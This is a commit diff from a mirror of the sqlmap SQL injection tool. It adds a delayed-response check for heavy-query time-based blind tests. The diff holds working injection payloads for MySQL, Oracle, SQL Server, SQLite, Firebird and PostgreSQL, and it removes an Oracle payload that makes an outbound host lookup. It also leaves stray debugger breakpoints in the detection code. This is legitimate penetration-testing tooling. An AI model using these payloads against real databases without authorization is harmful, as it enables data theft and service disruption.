sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

introducing [DELAYED] for heavy query time based payloads when response time is non-deterministic

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-07 00:27:26 +00:00
parent 32f1909131
commit 61f82fd274
4 changed files with 40 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
lib/controller/checks.py
View File

@ -45,6 +45,8 @@ from lib.core.exception import sqlmapSiteTooDynamic
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import sqlmapUserQuitException
from lib.core.session import setString from lib.core.session import setString
from lib.core.session import setRegexp from lib.core.session import setRegexp
from lib.core.settings import TIME_MIN_DELTA
from lib.core.settings import TIME_N_RESPONSE
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
from plugins.dbms.firebird.syntax import Syntax as Firebird from plugins.dbms.firebird.syntax import Syntax as Firebird
from plugins.dbms.postgresql.syntax import Syntax as PostgreSQL from plugins.dbms.postgresql.syntax import Syntax as PostgreSQL
@ -351,11 +353,23 @@ def checkSqlInjection(place, parameter, value):
_ = Request.queryPage(reqPayload, place) _ = Request.queryPage(reqPayload, place)
duration = calculateDeltaSeconds(start) duration = calculateDeltaSeconds(start)
if duration >= conf.timeSec: if check.isdigit():
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title) if duration >= int(check):
logger.info(infoMsg) infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
logger.info(infoMsg)
injectable = True injectable = True
elif check == "[DELAYED]":
if duration >= max(TIME_MIN_DELTA, TIME_N_RESPONSE * kb.responseTime):
import pdb
pdb.set_trace()
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
logger.info(infoMsg)
injectable = True
else:
import pdb
pdb.set_trace()
# Restore old value of socket timeout # Restore old value of socket timeout
socket.setdefaulttimeout(popValue()) socket.setdefaulttimeout(popValue())

2
lib/core/common.py
View File

@ -1281,7 +1281,7 @@ def calculateDeltaSeconds(start, epsilon=0.1):
Returns elapsed time from start till now (including expected Returns elapsed time from start till now (including expected
error set by epsilon parameter) error set by epsilon parameter)
""" """
return int(time.time() - start - kb.responseTime + epsilon) return time.time() - start - kb.responseTime + epsilon
def initCommonOutputs(): def initCommonOutputs():
kb.commonOutputs = {} kb.commonOutputs = {}

5
lib/core/settings.py
View File

@ -48,6 +48,11 @@ DUMP_STOP_MARKER = "__STOP__"
PAYLOAD_DELIMITER = "\x00" PAYLOAD_DELIMITER = "\x00"
# settings used for delayed time payloads
TIME_MIN_DELTA = 1 # minimum difference of loading time in seconds
TIME_N_RESPONSE = 3 # minimum multiplicant of response time
# System variables # System variables
IS_WIN = subprocess.mswindows IS_WIN = subprocess.mswindows
# The name of the operating system dependent module imported. The following # The name of the operating system dependent module imported. The following

50
xml/payloads.xml
View File

@ -1232,7 +1232,7 @@ Formats:
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>MySQL</dbms> <dbms>MySQL</dbms>
@ -1271,7 +1271,7 @@ Formats:
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>PostgreSQL</dbms> <dbms>PostgreSQL</dbms>
@ -1388,7 +1388,7 @@ Formats:
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>SQLite</dbms> <dbms>SQLite</dbms>
@ -1408,7 +1408,7 @@ Formats:
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Firebird</dbms> <dbms>Firebird</dbms>
@ -1452,7 +1452,7 @@ Formats:
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload> <payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>MySQL</dbms> <dbms>MySQL</dbms>
@ -1484,29 +1484,11 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3</clause>
<where>1</where> <where>1</where>
<request>
<payload>AND (SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM DUAL)>0</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<request> <request>
<payload>AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload> <payload>AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Oracle</dbms> <dbms>Oracle</dbms>
@ -1524,7 +1506,7 @@ Formats:
<payload>AND (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload> <payload>AND (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Microsoft SQL Server</dbms> <dbms>Microsoft SQL Server</dbms>
@ -1532,7 +1514,7 @@ Formats:
</test> </test>
<test> <test>
<title>SQLite &gt; 2.0 AND time-based blind (heavy query)</title> <title>SQLite &gt; 2.0 AND time-based blind</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
@ -1543,7 +1525,7 @@ Formats:
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload> <payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>SQLite</dbms> <dbms>SQLite</dbms>
@ -1563,7 +1545,7 @@ Formats:
<payload>AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> <payload>AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Firebird</dbms> <dbms>Firebird</dbms>
@ -1611,7 +1593,7 @@ Formats:
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload> <payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>MySQL</dbms> <dbms>MySQL</dbms>
@ -1647,7 +1629,7 @@ Formats:
<payload>OR (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload> <payload>OR (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Oracle</dbms> <dbms>Oracle</dbms>
@ -1665,7 +1647,7 @@ Formats:
<payload>OR (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload> <payload>OR (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Microsoft SQL Server</dbms> <dbms>Microsoft SQL Server</dbms>
@ -1673,7 +1655,7 @@ Formats:
</test> </test>
<test> <test>
<title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title> <title>SQLite &gt; 2.0 OR time-based blind</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
@ -1684,7 +1666,7 @@ Formats:
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload> <payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>SQLite</dbms> <dbms>SQLite</dbms>
@ -1704,7 +1686,7 @@ Formats:
<payload>OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> <payload>OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Firebird</dbms> <dbms>Firebird</dbms>